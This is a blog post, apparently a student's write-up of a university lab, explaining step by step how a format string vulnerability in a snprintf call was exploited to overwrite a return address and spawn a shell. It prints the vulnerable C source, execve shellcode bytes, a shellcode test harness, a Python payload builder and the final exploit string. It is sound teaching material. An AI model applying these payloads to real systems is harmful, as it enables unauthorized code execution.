Alexander Lee

Posted on Oct 4

Journey to understand format string attack (Part 2)

#formatstring #exploit

Part 1:
https://dev.to/duracellrabbid/journey-to-understand-format-string-attack-part-1-5dda

In Part 1, I mentioned that one of my motivations for writing these posts was that it took me a freaking long time to understand how a format string attack works. To give you some context, I first learned about it in late 2021/early 2022, and it took me a good 2.5 years to fully understand it. Still, I wanted to share my learning journey and where I eventually ended up.

The Task

Here, I will talk about the assignment that helped propel me into this journey. In the assignment, I was asked to run shellcode using a "memory exploit" in the program. The source code was provided and looked something like this:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int vul1(char *arg)
{
  char buffer[400];
  snprintf(buffer, sizeof buffer, arg);
  return 0;
}

int main(int argc, char *argv[])
{
  if (argc != 2)
    {
      fprintf(stderr, "cstarget: argc != 2\n");
      exit(EXIT_FAILURE);
    }
  vul1(argv[1]);

  return 0;
}

The code can be compiled with gcc using the following flags:

-mpreferred-stack-boundary=2 -ggdb -m32 -L/usr/lib32 -fno-stack-protector

Unfortunately, the source code and compilation flags were for reference only. I had to perform the attack on the given binary, with ASLR turned off.

Analysis

First of all, we can see that the binary must be run with exactly one argument.

It then uses snprintf to print this argument into a buffer of 400 chars. Initially, I thought this could be done with a buffer overflow, but snprintf checks against the size of the buffer, which makes a BoF attack unviable.

We are talking about format string vulnerabilities, right? Guess what? Our argument is passed to snprintf as the format string itself!

snprintf does not produce any visible output. It writes the formatted string, up to the specified length, into a buffer. A quick run of the binary with an argument confirms that.

No fear though! We have GDB. GDB is our friend. Let's bring along GEF for the ride as well.

From the screenshots, I noticed that buffer is at $esp. The return address is stored at buffer + 0x198. In any case, I knew that the saved return address is 0x56556236.

The simplest approach is to overwrite this address so that execution jumps to my shellcode. Since the stack is executable, there are 3 potential places to put the shellcode: buffer, arg and environment variables. I chose buffer as it is the easiest.

In addition, I observed one issue. Look at the screenshot where I planted 64 NOPs into the stack.

Note that the start of buffer changes as the size of the argument for vul1 increases. This is kind of expected. Remember my uglily drawn stack in Part 1:

Since parameters are placed before the return address, a larger parameter will push the rest of the stack further down.

Is that a concern for us? Yes and no. If we are not careful, the addresses that we need to write to will be wrong. However, if we formulate the format string right, we can get the addresses right where we want them.

The format string

In this round, my approach will be:

<shellcodes> + <NOP paddings> + <address1> + <address2> + %Ax%G$n%Bx%H$n

Shellcode + NOPs = 64 bytes (any multiple of 4 that fits the shellcode works)
address1 = the stack address that holds the return address
address2 = address1 + 0x2
A = lower-order 16 bits of the starting address of buffer - 64 - 8 (the 64 + 8 bytes in front of %Ax already count as output)
B = higher-order 16 bits of the starting address of buffer - lower-order 16 bits of the starting address of buffer
G = (64 / 4) + 1
H = G + 1
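The layout above can be sketched as a small Python helper. This is only an illustration of the recipe, not the exact script I used: the function name `build_payload` and the `pad_to` parameter are made up for this sketch, and it assumes a 32-bit little-endian target where position 1 of the format arguments lines up with the start of buffer.

```python
import struct


def build_payload(shellcode: bytes, buffer_addr: int, ret_slot: int, pad_to: int = 64) -> bytes:
    """Assemble <shellcode><NOPs><address1><address2>%Ax%G$n%Bx%H$n.

    buffer_addr: starting address of buffer (where the shellcode will sit)
    ret_slot:    stack address that holds the return address
    pad_to:      size of the shellcode + NOP area (hypothetical parameter)
    """
    if pad_to % 4 != 0 or len(shellcode) > pad_to:
        raise ValueError("pad_to must be a multiple of 4 and fit the shellcode")

    head = shellcode + b"\x90" * (pad_to - len(shellcode))
    address1 = struct.pack("<I", ret_slot)       # little-endian, 4 bytes
    address2 = struct.pack("<I", ret_slot + 2)   # upper half of the same slot

    low = buffer_addr & 0xFFFF    # lower-order 16 bits
    high = buffer_addr >> 16      # higher-order 16 bits
    a = low - pad_to - 8          # pad_to + 8 bytes are already counted
    b = high - low
    # %x of a 32-bit value prints at most 8 characters, so a width of at
    # least 8 guarantees that exactly `a` (or `b`) characters are counted.
    if a < 8 or b < 8:
        raise ValueError("this simple layout needs A and B to be at least 8")

    g = pad_to // 4 + 1
    h = g + 1
    fmt = f"%{a}x%{g}$n%{b}x%{h}$n".encode()
    return head + address1 + address2 + fmt
```

The helper refuses to build a string when A or B would be too small, because the simple "low half first, high half second" order only works when the high half of the address is larger than the low half.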

Sounds abstract? I guessed as much. Let's use Excel to visualize the stack.

A few observations here:

The shellcode is at the start of the buffer. This is because the starting address of the buffer is relatively easy to obtain. Not every day is a Saturday, so when you get the chance to be lazy, you take it.
The NOPs are there to align the stack. Imagine we did not have the NOPs; this would happen:

We would not be able to obtain the full addresses. The NOP padding ensures that our addresses always sit at the 17th and 18th positions on the stack. (Take 1 position on the stack as 4 bytes, since we are working with 32 bits.)
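To make the alignment point concrete, here is a minimal sketch that maps a byte offset inside buffer to the stack positions it touches. The helper name `slots_for` is made up for illustration, and it assumes position 1 starts at the first byte of buffer, as in the layout above.

```python
def slots_for(offset: int, size: int = 4, word: int = 4) -> list:
    """Return the 1-based stack positions covered by `size` bytes at `offset`."""
    first = offset // word + 1
    last = (offset + size - 1) // word + 1
    return list(range(first, last + 1))


# With 64 bytes of shellcode + NOPs, each address fills exactly one position.
print(slots_for(64))  # [17]
print(slots_for(68))  # [18]

# Without padding, an address placed right after the 45-byte shellcode
# straddles two positions, so no single %N$n can pick it up whole.
print(slots_for(45))  # [12, 13]
```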

Finding the addresses

I like to break my tasks down into smaller pieces. Let's break the format string into steps.

64 NOPs - They are placeholders for the shellcode

run $(python3 -c "import sys; sys.stdout.buffer.write(b'\x90'*64)")

64 NOPs + the 2 placeholder addresses

run $(python3 -c "import sys; sys.stdout.buffer.write(b'\x90'*64 + b'\xff' * 4 + b'\xee' * 4)")

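The entire format string with placeholder values (the widths have the same number of digits as the final ones, so the argument length, and with it the stack layout, stays the same)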

run $(python3 -c "import sys; sys.stdout.buffer.write(b'\x90'*64 + b'\xff' * 4 + b'\xee' * 4 + b'%12356x%17\$x%12345x%18\$x')")

From here, we know that our shellcode will start at 0xffffcdb4. We also know that the saved eip is stored at 0xffffcf4c. With this information:
address1 = \x4c\xcf\xff\xff
address2 = \x4e\xcf\xff\xff
A = 0xcdb4 - 72 = 52588
B = 0xffff - 0xcdb4 = 12875
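As a sanity check on the arithmetic above, the following sketch recomputes A and B and then models the two %n stores on a scratch byte array. It is a simplified model rather than a real run: `emulate_writes` is a made-up helper, and it assumes each %n stores a 4-byte little-endian count, as on 32-bit x86.

```python
import struct

buffer_addr = 0xFFFFCDB4   # start of buffer, where the shellcode begins
ret_slot = 0xFFFFCF4C      # stack address that holds the saved eip


def emulate_writes(writes, base, size=8):
    """Apply 4-byte little-endian stores (addr, value) to a zeroed scratch area."""
    mem = bytearray(size)
    for addr, value in writes:
        off = addr - base
        mem[off:off + 4] = struct.pack("<I", value)
    return mem


low, high = buffer_addr & 0xFFFF, buffer_addr >> 16
A = low - 64 - 8
B = high - low

count_first = 64 + 8 + A        # characters counted when %17$n fires
count_second = count_first + B  # characters counted when %18$n fires

mem = emulate_writes(
    [(ret_slot, count_first), (ret_slot + 2, count_second)],
    base=ret_slot,
)
new_ret = struct.unpack("<I", mem[:4])[0]

print(hex(ret_slot - buffer_addr))  # 0x198
print(A, B, hex(new_ret))           # 52588 12875 0xffffcdb4
```

Because %n stores a full 4-byte value, the second write also zeroes the two bytes just above the return address slot. That did not matter in this exercise, but it is worth keeping in mind.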

The shellcode

For the purpose of the exercise, we will use the following shellcode from this article:

"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh"

The next question is, how do we know if the shellcode works? We can test it with a simple C program.

// Filename: shellcode.c
// Compile:  gcc -m32 -z execstack -fno-stack-protector shellcode.c -o shellcode

#include <stdio.h>
#include <string.h>

void callShell(void) {
        // Local array, so it lives on the stack, which -z execstack makes executable
        const char code[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

        // strlen returns size_t, so print it with %zu
        printf("Shellcode Length: %zu\n", strlen(code));

        // Cast the array to a function pointer and jump into it
        ((void(*)(void))code)();
}

int main(void)
{
        callShell();
        return 0;
}

Nice, the length of the shellcode is 45, so we just need 19 more NOPs to pad it to 64. Some of you may have noticed that I could have padded with just 3 NOPs. But I like 64, so I went with 64.
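The same length and padding arithmetic can be double-checked in Python without running the shellcode. This is just a convenience sketch; `nops_needed` is a made-up helper name.

```python
shellcode = (
    b"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    b"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    b"\x80\xe8\xdc\xff\xff\xff/bin/sh"
)


def nops_needed(length: int, target: int = None) -> int:
    """NOPs required to pad `length` bytes up to `target`.

    Without a target, pad to the next multiple of 4.
    """
    if target is None:
        target = -(-length // 4) * 4  # round up to a multiple of 4
    if target < length or target % 4 != 0:
        raise ValueError("target must be a multiple of 4 and at least `length`")
    return target - length


print(len(shellcode))                   # 45
print(nops_needed(len(shellcode)))      # 3
print(nops_needed(len(shellcode), 64))  # 19
```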

shellcode + NOPs = \xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90

The full format string should be:

\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x4c\xcf\xff\xff\x4e\xcf\xff\xff%52588x%17$n%12875x%18$n
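Since segmentation faults are easy to run into, a quick pre-flight check on the raw bytes can save some debugging time. The sketch below assumes the string is delivered the same way as the earlier `run $(python3 -c ...)` commands, that is, as a single argv entry through an unquoted command substitution. The name `preflight` and its `raw_len` parameter are made up for illustration.

```python
def preflight(payload: bytes, raw_len: int = 72) -> list:
    """Return a list of problems that would corrupt the payload in transit.

    raw_len is the size of the binary part (shellcode + NOPs + 2 addresses).
    """
    problems = []
    if b"\x00" in payload:
        problems.append("NUL byte: cannot be carried inside an argv string")
    for ws in b" \t\n":
        if ws in payload:
            problems.append(
                f"whitespace byte 0x{ws:02x}: unquoted $(...) would split the argument"
            )
    if b"%" in payload[:raw_len]:
        problems.append("'%' in the binary part: snprintf would parse it as a conversion")
    return problems


# A deliberately broken example: the space would split the argument in two.
for problem in preflight(b"\x90" * 64 + b"AAAA BBB" + b"%12345x"):
    print(problem)
```

An empty list only means none of these three problems were found. It says nothing about whether the addresses themselves are right.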

Now we will test it out:

YES! A shell is opened. Mission accomplished? Not quite. There is more to the assignment, but that is beyond the scope of this write-up.

...One more thing

In essence, this should not be a difficult exercise for most seasoned CTF players. However, it is easy to run into segmentation faults when working with format string attacks, which can be frustrating for beginners like me. I found that the best thing to do is to break the task down into smaller pieces and figure out each piece individually.

To quote Dr Andrew Wiles: I think I'll stop here.
